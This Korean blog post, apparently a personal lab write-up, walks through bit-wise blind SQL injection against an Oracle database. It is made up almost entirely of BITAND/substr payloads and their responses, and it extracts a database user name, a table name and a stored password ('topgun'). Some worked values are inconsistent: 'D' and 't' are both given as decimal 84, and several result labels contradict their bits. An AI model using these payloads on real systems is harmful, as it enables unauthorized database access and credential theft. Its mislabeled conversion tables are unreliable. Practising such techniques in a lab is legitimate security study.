데이터 추론 기법(비트, ORACLE) 실습

Notice

Recent Posts

Recent Comments

Tags more

Archives

관리 메뉴

Oh! JUN

웹 해킹/SQL Injection

Kwon Oh! JUN 2022. 9. 1. 20:48

C##CREHACKTIVE → tb_board → IDX, PASSWORD

1. 사용자(DB) 이름 찾기

BITAND(ascii(substr((select user from dual),1,1)),1)=1	정상 출력 1	2진수 : 01000011 10진수 : 67 문자형 : 'C'
BITAND(ascii(substr((select user from dual),1,1)),2)=2	정상 출력 1
BITAND(ascii(substr((select user from dual),1,1)),4)=4	에러 발생 0
BITAND(ascii(substr((select user from dual),1,1)),8)=8	에러 발생 0
BITAND(ascii(substr((select user from dual),1,1)),16)=16	에러 발생 0
BITAND(ascii(substr((select user from dual),1,1)),32)=32	에러 발생 0
BITAND(ascii(substr((select user from dual),1,1)),64)=64	정상 출력 1
BITAND(ascii(substr((select user from dual),1,1)),128)=128	에러 발생 0
사용자(DB) : C?????????????

... 생략

BITAND(ascii(substr((select user from dual),14,1)),1)=1	정상 출력 1	2진수 : 01000101 10진수 : 69 문자형 : 'E'
BITAND(ascii(substr((select user from dual),14,1)),2)=2	에러 발생 0
BITAND(ascii(substr((select user from dual),14,1)),4)=4	에러 발생 1
BITAND(ascii(substr((select user from dual),14,1)),8)=8	에러 발생 0
BITAND(ascii(substr((select user from dual),14,1)),16)=16	에러 발생 0
BITAND(ascii(substr((select user from dual),14,1)),32)=32	에러 발생 0
BITAND(ascii(substr((select user from dual),14,1)),64)=64	정상 출력 1
BITAND(ascii(substr((select user from dual),14,1)),128)=128	에러 발생 0
사용자(DB) : C##CREHACKTIVE

2. 테이블 이름 찾기

BITAND(ascii(substr((select table_name from (select rownum r, table_name from all_tables where owner='C##CREHACKTIVE')a where a.r=1),1,1)),1)=1	정상 출력 0	2진수 : 01010100 10진수 : 84 문자형 : 'T'
BITAND(ascii(substr((select table_name from (select rownum r, table_name from all_tables where owner='C##CREHACKTIVE')a where a.r=1),1,1)),2)=2	에러 발생 0
BITAND(ascii(substr((select table_name from (select rownum r, table_name from all_tables where owner='C##CREHACKTIVE')a where a.r=1),1,1)),4)=4	정상 출력 1
BITAND(ascii(substr((select table_name from (select rownum r, table_name from all_tables where owner='C##CREHACKTIVE')a where a.r=1),1,1)),8)=8	정상 출력 0
BITAND(ascii(substr((select table_name from (select rownum r, table_name from all_tables where owner='C##CREHACKTIVE')a where a.r=1),1,1)),16)=16	에러 발생 1
BITAND(ascii(substr((select table_name from (select rownum r, table_name from all_tables where owner='C##CREHACKTIVE')a where a.r=1),1,1)),32)=32	에러 발생 0
BITAND(ascii(substr((select table_name from (select rownum r, table_name from all_tables where owner='C##CREHACKTIVE')a where a.r=1),1,1)),64)=64	정상 출력 1
BITAND(ascii(substr((select table_name from (select rownum r, table_name from all_tables where owner='C##CREHACKTIVE')a where a.r=1),1,1)),128)=128	에러 발생 0
테이블 : T???????

. 생략

BITAND(ascii(substr((select table_name from (select rownum r, table_name from all_tables where owner='C##CREHACKTIVE')a where a.r=1),8,1)),1)=1	정상 출력 0	2진수 : 01000100 10진수 : 84 문자형 : 'D'
BITAND(ascii(substr((select table_name from (select rownum r, table_name from all_tables where owner='C##CREHACKTIVE')a where a.r=1),8,1)),2)=2	에러 발생 0
BITAND(ascii(substr((select table_name from (select rownum r, table_name from all_tables where owner='C##CREHACKTIVE')a where a.r=1),8,1)),4)=4	정상 출력 1
BITAND(ascii(substr((select table_name from (select rownum r, table_name from all_tables where owner='C##CREHACKTIVE')a where a.r=1),8,1)),8)=8	정상 출력 0
BITAND(ascii(substr((select table_name from (select rownum r, table_name from all_tables where owner='C##CREHACKTIVE')a where a.r=1),8,1)),16)=16	에러 발생 0
BITAND(ascii(substr((select table_name from (select rownum r, table_name from all_tables where owner='C##CREHACKTIVE')a where a.r=1),8,1)),32)=32	에러 발생 0
BITAND(ascii(substr((select table_name from (select rownum r, table_name from all_tables where owner='C##CREHACKTIVE')a where a.r=1),8,1)),64)=64	정상 출력 1
BITAND(ascii(substr((select table_name from (select rownum r, table_name from all_tables where owner='C##CREHACKTIVE')a where a.r=1),8,1)),128)=128	에러 발생 0
테이블 : TB_BOARD

3.데이터

BITAND(ascii(substr((select PASSWORD from C##CREHACKTIVE.TB_BOARD where IDX=63),1,1)),1)=1	정상 출력 0	2진수 : 01110100 10진수 : 84 문자형 : 't'
BITAND(ascii(substr((select PASSWORD from C##CREHACKTIVE.TB_BOARD where IDX=63),1,1)),2)=2	에러 발생 0
BITAND(ascii(substr((select PASSWORD from C##CREHACKTIVE.TB_BOARD where IDX=63),1,1)),4)=4	정상 출력 1
BITAND(ascii(substr((select PASSWORD from C##CREHACKTIVE.TB_BOARD where IDX=63),1,1)),8)=8	정상 출력 0
BITAND(ascii(substr((select PASSWORD from C##CREHACKTIVE.TB_BOARD where IDX=63),1,1)),16)=16	에러 발생 1
BITAND(ascii(substr((select PASSWORD from C##CREHACKTIVE.TB_BOARD where IDX=63),1,1)),32)=32	에러 발생 1
BITAND(ascii(substr((select PASSWORD from C##CREHACKTIVE.TB_BOARD where IDX=63),1,1)),64)=64	정상 출력 1
BITAND(ascii(substr((select PASSWORD from C##CREHACKTIVE.TB_BOARD where IDX=63),1,1)),128)=128	에러 발생 0
DATA : t?????

. 생략

BITAND(ascii(substr((select PASSWORD from C##CREHACKTIVE.TB_BOARD where IDX=63),6,1)),1)=1	정상 출력 0	2진수 : 01101110 10진수 : 110 문자형 : 'n'
BITAND(ascii(substr((select PASSWORD from C##CREHACKTIVE.TB_BOARD where IDX=63),6,1)),2)=2	에러 발생 1
BITAND(ascii(substr((select PASSWORD from C##CREHACKTIVE.TB_BOARD where IDX=63),6,1)),4)=4	정상 출력 1
BITAND(ascii(substr((select PASSWORD from C##CREHACKTIVE.TB_BOARD where IDX=63),6,1)),8)=8	정상 출력 1
BITAND(ascii(substr((select PASSWORD from C##CREHACKTIVE.TB_BOARD where IDX=63),6,1)),16)=16	에러 발생 0
BITAND(ascii(substr((select PASSWORD from C##CREHACKTIVE.TB_BOARD where IDX=63),6,1)),32)=32	에러 발생 1
BITAND(ascii(substr((select PASSWORD from C##CREHACKTIVE.TB_BOARD where IDX=63),6,1)),64)=64	정상 출력 1
BITAND(ascii(substr((select PASSWORD from C##CREHACKTIVE.TB_BOARD where IDX=63),6,1)),128)=128	에러 발생 0
DATA : topgun

[DVWA] SQL Injection 실습 (Low Level, blind+비트) (0)	2022.09.13
[DVWA] SQL INJECTION 실습 (Low Level) (0)	2022.09.04
데이터 추론 기법(비트, MYSQL) 실습 (0)	2022.08.31
데이터 추론 기법(아스키코드) 실습 (0)	2022.08.30
데이터 추론 기법(순차탐색) 실습(feat. Burp Suite Intruder 활용) (0)	2022.08.30

'웹 해킹/SQL Injection' Related Articles